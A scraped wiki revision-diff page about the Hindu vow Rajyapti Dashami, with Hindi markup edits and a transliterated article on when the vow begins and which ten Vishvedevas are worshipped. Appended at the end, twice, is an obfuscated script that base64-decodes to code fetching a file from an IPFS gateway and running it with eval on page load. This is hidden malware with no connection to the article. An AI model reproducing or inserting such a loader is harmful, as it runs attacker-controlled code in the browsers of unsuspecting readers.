Difference between revisions of "राज्याप्ति दशमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[कार्तिक]] [[शुक्ल पक्ष]] की [[दशमी]] से आरम्भ करना चाहिए।  
 
*यह व्रत [[कार्तिक]] [[शुक्ल पक्ष]] की [[दशमी]] से आरम्भ करना चाहिए।  
 
*इस व्रत में ऋतु, दक्ष आदि दस विश्वेदेवों के रूप में [[केशव]] की पूजा करनी चाहिए।  
 
*इस व्रत में ऋतु, दक्ष आदि दस विश्वेदेवों के रूप में [[केशव]] की पूजा करनी चाहिए।  
Line 7: Line 7:
 
*दस विश्वेदेवों के नाम हैं–[[वसु]], [[सत्य]], [[ऋतु]], [[दक्ष]], [[काल]], [[काम]], [[धृति]], [[कुरु]], [[पुरूरवा]] एवं [[भाद्रव]]।
 
*दस विश्वेदेवों के नाम हैं–[[वसु]], [[सत्य]], [[ऋतु]], [[दक्ष]], [[काल]], [[काम]], [[धृति]], [[कुरु]], [[पुरूरवा]] एवं [[भाद्रव]]।
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 10:33, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat kartik shukl paksh ki dashami se arambh karana chahie.
  • is vrat mean rritu, daksh adi das vishvedevoan ke roop mean keshav ki pooja karani chahie.
  • yah pooja krity mandaloan ya sone ya chaandi ki pratimaoan mean hoti hai.
  • varsh ke ant mean hariny dan karana chahie.
  • isake karane se vishnulok ki prapti, usake uparant karta ek raja ya brahmanoan mean shreshth brahman banata hai.[1]
  • das vishvedevoan ke nam haian–vasu, saty, rritu, daksh, kal, kam, dhriti, kuru, puroorava evan bhadrav.


tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 965-966, vishnudharmottarapuran se uddharan).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>